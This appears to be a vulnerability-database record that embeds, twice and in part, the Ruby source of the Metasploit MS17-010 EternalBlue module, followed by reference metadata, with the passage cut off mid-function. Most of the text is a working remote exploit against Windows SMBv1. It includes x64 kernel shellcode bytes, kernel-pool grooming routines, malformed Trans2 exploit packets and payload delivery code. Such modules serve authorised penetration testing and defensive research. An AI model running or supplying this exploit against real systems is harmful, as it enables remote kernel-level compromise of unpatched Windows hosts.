\"\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\" +\n \"\\x00\\x00\\x00\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\" +\n \"\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\" +\n \"\\x00\\x00\\x50\\x53\\x51\\x52\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\" +\n \"\\x53\\x41\\x54\\x41\\x55\\x41\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\" +\n \"\\x00\\x00\\x00\\x41\\x53\\x6A\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\" +\n \"\\x48\\x81\\xEC\\x58\\x01\\x00\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\" +\n \"\\x89\\x9D\\xC0\\x00\\x00\\x00\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\" +\n \"\\xD0\\x00\\x00\\x00\\x48\\xA1\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\" +\n \"\\xC2\\x48\\xC1\\xEA\\x20\\x48\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\" +\n \"\\x00\\xC0\\x0F\\x30\\xFB\\xE8\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\" +\n \"\\xA8\\x01\\x00\\x00\\x48\\x83\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\" +\n \"\\x41\\x5B\\x41\\x5A\\x41\\x59\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\" +\n \"\\x48\\x8B\\x24\\x25\\x10\\x00\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\" +\n \"\\xD0\\xFF\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\" +\n \"\\x66\\x83\\xE4\\xF0\\x48\\x83\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\" +\n \"\\x4C\\x8B\\x3C\\x25\\x38\\x00\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\" +\n \"\\x49\\xC1\\xE7\\x0C\\x49\\x81\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\" +\n \"\\xFE\\x4D\\x5A\\x75\\xEF\\x41\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\" +\n \"\\x48\\x89\\xC6\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\" +\n \"\\xE8\\x03\\x02\\x00\\x00\\x48\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\" +\n \"\\x00\\x05\\x00\\x00\\x48\\x39\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\" +\n \"\\x36\\x48\\x39\\xCE\\x75\\xE2\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\" +\n \"\\x81\\xF9\\x00\\x00\\x01\\x00\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\" +\n \"\\xCB\\x41\\xBB\\x66\\x55\\xA2\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\" +\n \"\\x49\\x8B\\x0E\\x41\\xBB\\xA3\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\" +\n \"\\xC6\\xE8\\x50\\x01\\x00\\x00\\x41\\x81\\xF9\\xBF\\x77\\x1F\\xDD\\x75\\xBC\\x49\" +\n \"\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\" +\n \"\\x11\\xDC\\xE8\\x81\\x01\\x00\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\" +\n \"\\x4E\\x08\\x49\\xC7\\x01\\x00\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\" +\n \"\\xC9\\x48\\x89\\x0A\\x48\\xF7\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\" +\n \"\\x20\\xE8\\x52\\x01\\x00\\x00\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\" +\n \"\\x3E\\x48\\x8D\\x35\\xE9\\x00\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\" +\n \"\\x00\\x66\\x81\\xC1\\xF9\\x00\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\" +\n \"\\x00\\x00\\x48\\x89\\xF1\\x48\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\" +\n \"\\x48\\x83\\xEC\\x20\\x41\\xBB\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\" +\n \"\\x83\\xC4\\x20\\x5A\\x59\\x48\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\" +\n \"\\x00\\x48\\x85\\xC0\\x74\\x0C\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\" +\n \"\\x72\\x05\\x48\\x8B\\x09\\xEB\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\" +\n \"\\x80\\xC2\\x90\\x31\\xC9\\x41\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\" +\n \"\\x48\\x89\\xC1\\x4C\\x8D\\x89\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\" +\n \"\\xE2\\x49\\x89\\xC4\\x4D\\x31\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\" +\n \"\\x50\\x48\\x83\\xEC\\x20\\x41\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\" +\n \"\\x31\\xD2\\x52\\x52\\x41\\x58\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\" +\n \"\\x9E\\xE8\\x82\\x00\\x00\\x00\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\" +\n \"\\x74\\x00\\x00\\x00\\x48\\x89\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\" +\n \"\\x00\\x00\\x48\\x89\\xEC\\x5D\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\" +\n \"\\xC3\\xE9\\xB5\\x00\\x00\\x00\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\" +\n \"\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\" +\n \"\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\" +\n \"\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\" +\n \"\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\" +\n \"\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\" +\n \"\\x51\\x56\\x48\\x89\\xC2\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\" +\n \"\\x00\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\" +\n \"\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\" +\n \"\\xD9\\x75\\xEC\\x58\\x44\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\" +\n \"\\x44\\x8B\\x40\\x1C\\x49\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\" +\n \"\\x5A\\x41\\x58\\x41\\x59\\x41\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\" +\n \"\\x89\\xE5\\x48\\x83\\xEC\\x20\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\" +\n \"\\xFF\\x31\\xC9\\x51\\x51\\x51\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\" +\n \"\\x5A\\x48\\x83\\xEC\\x20\\x41\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\" +\n \"\\x48\\x89\\xEC\\x5D\\x41\\x5F\\x5E\\xC3\"#\\x01\\x00\\xC3\"\n\n end\n\n # Sets common SMB1 Header values used by the various\n # packets in the exploit.\n #\n # @return [RubySMB::GenericPacket] the modified version of the packet\n def set_smb1_headers(packet,tree_id,user_id)\n packet.smb_header.flags2.read(\"\\x07\\xc0\")\n packet.smb_header.tid = tree_id\n packet.smb_header.uid = user_id\n packet.smb_header.pid_low = 65279\n packet.smb_header.mid = 64\n packet\n end\n\n\n # Returns the value to be passed to SMB clients for\n # the password. If the user has not supplied a password\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the password value\n def smb_pass\n if datastore['SMBPass'].present?\n datastore['SMBPass']\n else\n ''\n end\n end\n\n # Returns the value to be passed to SMB clients for\n # the username. If the user has not supplied a username\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the username value\n def smb_user\n if datastore['SMBUser'].present?\n datastore['SMBUser']\n else\n ''\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "type": "metasploit", "viewCount": 1542}, "differentElements": ["published", "modified"], "edition": 29, "lastseen": "2018-04-14T18:18:58"}], "viewCount": 6064, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-10-07T20:17:30", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2020-10-07T20:17:30", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_eternalblue.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'ruby_smb'\nrequire 'ruby_smb/smb1/packet'\nrequire 'windows_error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::CheckModule\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',\n 'Description' => %q{\n This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.\n },\n\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius\n 'Equation Group',\n 'Shadow Brokers',\n 'thelightcosine' # RubySMB refactor and Fallback Credential mode\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://github.com/RiskSense-Ops/MS17-010']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',\n 'WfsDelay' => 5\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 2000, # this can be more, needs to be recalculated\n 'EncoderType' => Msf::Encoder::Type::Raw\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Windows 7 and Server 2008 R2 (x64) All Service Packs',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'os_patterns' => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'],\n 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset\n 'et_alertable' => 0x4c, # ETHREAD.Alertable offset\n 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset\n 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2017-03-14',\n 'Notes' =>\n {\n 'AKA' => ['ETERNALBLUE']\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(445),\n OptBool.new('VERIFY_TARGET', [true, 'Check if remote OS matches exploit Target.', true]),\n OptBool.new('VERIFY_ARCH', [true, 'Check if remote architecture matches exploit Target.', true]),\n OptString.new('SMBUser', [false, '(Optional) The username to authenticate as', '']),\n OptString.new('SMBPass', [false, '(Optional) The password for the specified username', '']),\n OptString.new('SMBDomain', [false, '(Optional) The Windows domain to use for authentication', '.'])\n ]\n )\n register_advanced_options(\n [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('ProcessName', [true, 'Process to inject payload into.', 'spoolsv.exe']),\n OptInt.new('MaxExploitAttempts', [true, 'The number of times to retry the exploit.', 3]),\n OptInt.new('GroomAllocations', [true, 'Initial number of times to groom the kernel pool.', 12]),\n OptInt.new('GroomDelta', [true, 'The amount to increase the groom count by per try.', 5])\n ]\n )\n\n end\n\n class EternalBlueError < StandardError\n end\n\n def exploit\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\n end\n\n begin\n for i in 1..datastore['MaxExploitAttempts']\n grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)\n smb_eternalblue(datastore['ProcessName'], grooms)\n\n # we don't need this sleep, and need to find a way to remove it\n # problem is session_count won't increment until stage is complete :\\\n secs = 0\n while !session_created? && (secs < 30)\n secs += 1\n sleep 1\n end\n\n if session_created?\n print_good('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\n print_good('=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\n print_good('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\n break\n else\n print_bad('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\n print_bad('=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\n print_bad('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\n end\n end\n rescue EternalBlueError => e\n print_error(e.message.to_s)\n return false\n rescue ::RubySMB::Error::NegotiationFailure\n print_error('SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.')\n return false\n rescue ::RubySMB::Error::UnexpectedStatusCode,\n ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused,\n ::RubySMB::Error::CommunicationError => e\n print_error(\"#{e.class}: #{e.message}\")\n report_failure\n return false\n rescue StandardError => e\n print_error(e.class.to_s)\n print_error(e.message)\n print_error(e.backtrace.join(\"\\n\"))\n return false\n ensure\n # pass\n end\n end\n\n def smb_eternalblue(process_name, grooms)\n begin\n # Step 0: pre-calculate what we can\n shellcode = make_kernel_user_payload(payload.encode, process_name, 0, 0, 0, 0)\n payload_hdr_pkt = make_smb2_payload_headers_packet\n payload_body_pkt = make_smb2_payload_body_packet(shellcode)\n\n # Step 1: Connect to IPC$ share\n print_status('Connecting to target for exploitation.')\n client, tree, sock, os = smb1_anonymous_connect_ipc\n rescue RubySMB::Error::CommunicationError\n # Error handler in case SMBv1 disabled on target\n raise EternalBlueError, 'Could not make SMBv1 connection'\n else\n print_good('Connection established for exploitation.')\n\n if verify_target(os)\n print_good('Target OS selected valid for OS indicated by SMB reply')\n else\n print_warning('Target OS selected not valid for OS indicated by SMB reply')\n print_warning('Disable VerifyTarget option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Target.'\n end\n\n # cool buffer print no matter what, will be helpful when people post debug issues\n print_core_buffer(os)\n\n if verify_arch\n print_good('Target arch selected valid for arch indicated by DCE/RPC reply')\n else\n print_warning('Target arch selected not valid for arch indicated by DCE/RPC reply')\n print_warning('Disable VerifyArch option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Arch.'\n end\n\n print_status(\"Trying exploit with #{grooms} Groom Allocations.\")\n\n # Step 2: Create a large SMB1 buffer\n print_status('Sending all but last fragment of exploit packet')\n smb1_large_buffer(client, tree, sock)\n\n # Step 3: Groom the pool with payload packets, and open/close SMB1 packets\n print_status('Starting non-paged pool grooming')\n\n # initialize_groom_threads(ip, port, payload, grooms)\n fhs_sock = smb1_free_hole(true)\n\n @groom_socks = []\n\n print_good('Sending SMBv2 buffers')\n smb2_grooms(grooms, payload_hdr_pkt)\n\n fhf_sock = smb1_free_hole(false)\n\n print_good('Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.')\n fhs_sock.shutdown\n\n print_status('Sending final SMBv2 buffers.') # 6x\n smb2_grooms(6, payload_hdr_pkt) # TODO: magic #\n\n fhf_sock.shutdown\n\n print_status('Sending last fragment of exploit packet!')\n final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)\n sock.put(final_exploit_pkt)\n\n print_status('Receiving response from exploit packet')\n code, raw = smb1_get_response(sock)\n\n code_str = '0x' + code.to_i.to_s(16).upcase\n if code.nil?\n print_error('Did not receive a response from exploit packet')\n elsif code == 0xc000000d # STATUS_INVALID_PARAMETER (0xC000000D)\n print_good(\"ETERNALBLUE overwrite completed successfully (#{code_str})!\")\n else\n print_warning(\"ETERNALBLUE overwrite returned unexpected status code (#{code_str})!\")\n end\n\n # Step 4: Send the payload\n print_status('Sending egg to corrupted connection.')\n\n @groom_socks.each { |gsock| gsock.put(payload_body_pkt.first(2920)) }\n @groom_socks.each { |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }\n\n print_status('Triggering free of corrupted buffer.')\n # tree disconnect\n # logoff and x\n # note: these aren't necessary, just close the sockets\n return true\n ensure\n abort_sockets\n end\n end\n\n def verify_target(os)\n os = os.gsub(\"\\x00\", '') # strip unicode bs\n os << \"\\x00\" # but original has a null\n ret = true\n\n if datastore['VerifyTarget']\n ret = false\n # search if its in patterns\n target['os_patterns'].each do |pattern|\n if os.downcase.include? pattern.downcase\n ret = true\n break\n end\n end\n end\n\n return ret\n end\n\n def verify_arch\n return true unless datastore['VerifyArch']\n\n # XXX: This sends a new DCE/RPC packet\n arch = dcerpc_getarch\n\n return true if arch && arch == target_arch.first\n\n print_warning(\"Target arch is #{target_arch.first}, but server returned #{arch.inspect}\")\n print_warning('The DCE/RPC service or probe may be blocked') if arch.nil?\n false\n end\n\n def print_core_buffer(os)\n print_status(\"CORE raw buffer dump (#{os.length} bytes)\")\n\n count = 0\n chunks = os.scan(/.{1,16}/)\n chunks.each do |chunk|\n hexdump = chunk.chars.map { |ch| ch.ord.to_s(16).rjust(2, '0') }.join(' ')\n\n format = format('0x%08x %-47s %-16s', (count * 16), hexdump, chunk)\n print_status(format)\n count += 1\n end\n end\n\n '''\n #\n # Increase the default delay by five seconds since some kernel-mode\n # payloads may not run immediately.\n #\n def wfs_delay\n super + 5\n end\n '''\n\n def smb2_grooms(grooms, payload_hdr_pkt)\n grooms.times do |_groom_id|\n gsock = connect(false)\n @groom_socks << gsock\n gsock.put(payload_hdr_pkt)\n end\n end\n\n def smb1_anonymous_connect_ipc\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, smb3: false, username: smb_user, domain: smb_domain, password: smb_pass)\n response_code = client.login\n\n unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS\n raise RubySMB::Error::UnexpectedStatusCode, \"Error with login: #{response_code}\"\n end\n\n os = client.peer_native_os\n\n tree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\")\n\n return client, tree, sock, os\n end\n\n def smb1_large_buffer(client, tree, sock)\n nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)\n\n # send NT Trans\n vprint_status('Sending NT Trans Request packet')\n\n client.send_recv(nt_trans_pkt)\n # Initial Trans2 request\n trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)\n\n # send all but last packet\n for i in 1..14\n trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)\n end\n\n vprint_status('Sending malformed Trans2 packets')\n sock.put(trans2_pkt_nulled)\n\n begin\n sock.get_once\n rescue EOFError\n vprint_error('No response back from SMB echo request. Continuing anyway...')\n end\n\n client.echo(count: 1, data: \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\")\n end\n\n def smb1_free_hole(start)\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, smb3: false, username: smb_user, domain: smb_domain, password: smb_pass)\n client.negotiate\n\n pkt = ''\n\n if start\n vprint_status('Sending start free hole packet.')\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\")\n else\n vprint_status('Sending end free hole packet.')\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\")\n end\n\n client.send_recv(pkt)\n sock\n end\n\n def smb1_get_response(sock)\n raw = nil\n\n # dirty hack since it doesn't always like to reply the first time...\n 16.times do\n raw = sock.get_once\n break unless raw.nil? || raw.empty?\n end\n\n return nil unless raw\n\n response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])\n code = response.nt_status\n return code, raw, response\n end\n\n def make_smb2_payload_headers_packet\n # don't need a library here, the packet is essentially nonsensical\n pkt = ''\n pkt << \"\\x00\" # session message\n pkt << \"\\x00\\xff\\xf7\" # size\n pkt << \"\\xfeSMB\" # SMB2\n pkt << \"\\x00\" * 124\n\n pkt\n end\n\n def make_smb2_payload_body_packet(kernel_user_payload)\n # precalculated lengths\n pkt_max_len = 4204\n pkt_setup_len = 497\n pkt_max_payload = pkt_max_len - pkt_setup_len # 3575\n\n # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode\n pkt = 